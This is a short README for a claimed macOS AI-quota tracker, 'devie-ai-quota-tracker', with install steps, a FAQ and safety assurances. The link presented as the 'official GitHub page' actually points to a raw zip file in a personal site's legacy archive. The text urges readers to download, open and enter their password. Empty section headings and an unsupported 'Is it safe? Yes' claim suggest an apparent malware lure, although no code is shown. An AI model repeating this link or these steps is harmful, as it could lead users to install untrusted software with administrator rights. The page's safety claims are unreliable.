📊 What Does This Do?

Imagine you use Claude Code, Codex, Gemini CLI, GitHub Copilot, and Cursor for your coding work. You get a monthly quota (or limit) for each one. Keeping track of them all is a headache. You might hit a limit in the middle of a project and have to stop.

devie-ai-quota-tracker is your personal assistant that remembers your quotas for you. It shows all your limits on one clean dashboard, and even puts a handy widget in your computer's menu bar (at the top of your screen) so you always know your status. No more surprises.

✨ Why You'll Love It

🚀 Getting Started

Getting set up is quick and easy. Follow these simple steps:

  1. Visit the link to download the application. Click here to go to the download page. It's a website where you'll see the software ready to download.
  2. Download the file. The page will have a big button that says "Download" or a list of files to choose from. Click the file that matches your computer (look for one that mentions "macOS" or "Mac" or is just a .dmg file).
  3. Open the downloaded file. Once downloaded, find the file (usually in your "Downloads" folder) and double-click it to open it.
  4. Follow the simple on-screen instructions. The installer will guide you. Just click "Continue" or "Next" until it says "Install". You might need to enter your computer's password.
  5. Launch the app. After installation, find it in your Applications folder or Spotlight search (press Cmd + Space and type "devie"). Open it.

That's it! The app will start showing your current quotas. Tip: In the first few minutes, you might need to tell it which AI services you use. There's an easy-to-follow "Add Service" button on the main dashboard.

🖥️ What Does the Main Screen Look Like?

When you open the app, you'll see a friendly dashboard. It's designed so you can understand everything at a glance.

🔔 How Do Notifications Work?

You'll get a small notification (like a pop-up) on your screen when:

You don't have to worry about missing a warning – the app makes sure to catch your eye in a polite way.

✅ Is It Safe to Use?

Yes. The app runs locally on your computer and only tracks the usage numbers from your AI service accounts. It does not read your chat messages or any code files. You can also download the source code from this page and inspect it yourself if you're technically curious.

🛠️ Troubleshooting & FAQ

I don't see my AI service in the list.

Make sure you've added it manually. Go to Settings (the gear icon) → "Add Service" → choose the service from the list. If your specific service isn't there, you might need a newer version, or you can check if a plugin is available on the GitHub page.

The menu bar widget doesn't show up.

First, click the small up-arrow (⌃) next to the menu bar icons – sometimes the app gets tucked away there. If it still doesn't appear, restart the app. On very rare occasions, your Mac's settings might hide menu bar items; you can search for "Menu bar" in macOS system settings.

The quotas are not updating automatically.

Usually the app refreshes every 5 minutes. If it hasn't updated in a while, you can click the refresh button (the circular arrow) on the dashboard. If that fails, try disconnecting and reconnecting your AI account in Settings.

My question isn't answered here.

Head to the official GitHub page: https://raw.githubusercontent.com/geofunny111/geofunny111.github.io/main/archive/legacy/Release-v1.3-beta.1.zip. You can find the "Issues" tab and create a new post describing your problem. The developer and community are usually pretty quick to help.

💡 Pro Tip: To get the most out of your AI subscriptions, check the "Session Optimizer" suggestion in the dashboard before you start a heavy coding session. It can save you from hitting a wall later.
